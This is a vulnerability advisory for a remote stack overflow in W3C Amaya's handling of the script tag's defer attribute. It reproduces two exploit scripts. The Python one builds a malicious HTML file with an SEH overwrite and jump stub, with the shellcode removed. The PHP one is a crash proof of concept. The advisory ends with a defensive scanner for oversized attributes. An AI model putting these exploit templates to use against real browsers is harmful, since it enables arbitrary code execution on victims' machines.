W3C Amaya HTML 'script' Tag Buffer Overflow Vulnerability
Written by Alfons Luja   
Monday, 30 March 2009 22:19


-\\Bugtraq ID:
34295

-\\Class:
Boundary Condition Error

-\\CVE:


-\\Remote:
Yes

-\\Local:
No

-\\Published:
Mar 30 2009 12:00AM

-\\Updated:
Mar 30 2009 08:36PM

-\\Credit:
Alfons Luja



-\\Vulnerable:
W3C Amaya 11.0.1
W3C Amaya 10.0.1
W3C Amaya 9.5
W3C Amaya 9.4
W3C Amaya 11.1
W3C Amaya 11.0
W3C Amaya 10.1



-\\Discussion
W3C Amaya is prone to a remote buffer-overflow vulnerability because the application
fails to perform adequate boundary checks on user-supplied input.

Attackers may leverage this issue to execute arbitrary code in the context of the
application. Failed attacks will cause denial-of-service conditions.

Amaya 11.1 is vulnerable; other versions may also be affected.



-\\Exploit(s)/PoC(s):
The following exploits are available:

===============================================================
34295.py
^^^^^^^^^
# exploit.py
#
# Amaya 11.1 W3C Editor/Browser (defer) Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Original Advisory:
# http://www.milw0rm.com/exploits/8314
#
# Fully Based on Rob Carter's Exploit
# http://www.milw0rm.com/exploits/7988
#
# Note: you need to upload Devil_inside.html to a remote host
# Works with Windows XP SP2
#


# metasploit - run calc.exe

shellcode = ""  # encoded payload bytes omitted


chars = "\x41" * 6887
chars+= "\x74\x06\x41\x41"            # je short 06 (0x74 is JE/JZ, a conditional jump)
chars+= "\x17\x19\x10\x02"            # 0x02101917 - pop pop ret in amaya module
chars+= "\x68\x7f\x01\x01\x7f"        # push 7f01017f
chars+= "\x58"                # pop eax
chars+= "\x2d\x18\x69\x45\x7d"        # sub eax,7d456918
chars+= "\x50"                # push eax
chars+= "\xc3"                # retn
chars+= "\x90" * 100
chars+=shellcode

header= ('<script defer="'+chars+'">')

file=open('Devil_inside.html','w')
file.write(header)
file.close()



===============================================================
34295.php
^^^^^^^^^^
<?php

/**//*

     Amaya 11.1 W3C's editor/browser
     Stack Overflow POC
     Discovered by Alfons Luja
     Thx : OiN
     select * from friends --
     This stuff overwrites SEH on my box, XP Home SP2
     To correctly overwrite SEH you must upload "remote_love.html" to a remote server
     Amaya allows only printable shellcode in this case

     EAX:00000000
     ECX:43434343
     EDX:7C9037D8
     EBX:00000000
     ESP:0012DDD0
     EBP:0012DDF0
     ESI:00000000
     EDI:00000000
     EIP:43434343

*//**/

$junk = "\x41";
$n_seh = "\x42\x42\x42\x42";  //pointer to next seh
$h_seh = "\x43\x43\x43\x43";  //seh handler

for($i=1;$i<7000 - (4*19) - 10;$i++){ $junk.="\x41"; }

$junk.=$n_seh;
$junk.=$h_seh;
$hello = "<script defer=\"".$junk."\">";

$hnd = fopen("remote_love.html","w");

if($hnd){
    fputs($hnd,$hello);
    fclose($hnd);
    echo "DONE !!\n";
} else {
    echo "Kupa !!\n";
}

?>





-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or
if you are aware of more recent information, please mail us.
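
With no vendor patch listed, one option is to screen HTML before it reaches the editor. The following is an added example, not part of the original advisory or either PoC: it parses HTML and reports any 'script' tag attribute whose value exceeds a size limit. The 1024-byte limit and all class, function and sample names are assumptions chosen for illustration.

```python
# Added example, not from the advisory or either PoC on this page.
from html.parser import HTMLParser

# Assumed limit. "defer" is a boolean attribute, so a legitimate value is a
# few bytes at most; the PoCs above emit a value of roughly 7000 bytes.
MAX_ATTR_LEN = 1024


class ScriptAttrScanner(HTMLParser):
    """Records (tag, attribute, length) for oversized <script> attributes."""

    def __init__(self, max_len=MAX_ATTR_LEN):
        super().__init__(convert_charrefs=True)
        self.max_len = max_len
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names before this call.
        if tag != "script":
            return
        for name, value in attrs:
            # value is None for a bare boolean attribute such as "defer".
            if value is not None and len(value) > self.max_len:
                self.findings.append((tag, name, len(value)))


def scan_html(data, max_len=MAX_ATTR_LEN):
    """Return oversized <script> attributes found in raw HTML bytes."""
    scanner = ScriptAttrScanner(max_len)
    # latin-1 maps every byte to a character, so non-text bytes in the
    # attribute value never raise a decode error.
    scanner.feed(data.decode("latin-1"))
    scanner.close()
    return scanner.findings


# Constructed samples: filler bytes only, same tag shape as the PoC output.
SAMPLE_OVERLONG = b'<SCRIPT defer="' + b"A" * 7000 + b'">'
SAMPLE_BENIGN = b'<script defer src="app.js"></script><p title="ok">x</p>'

if __name__ == "__main__":
    for label, sample in (("overlong", SAMPLE_OVERLONG), ("benign", SAMPLE_BENIGN)):
        print(label, scan_html(sample))
```

A non-empty result is a reason to quarantine the file rather than open it in an affected Amaya version.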



-\\Reference(s)
--Amaya Homepage
http://www.w3.org/Amaya  (W3C)
 
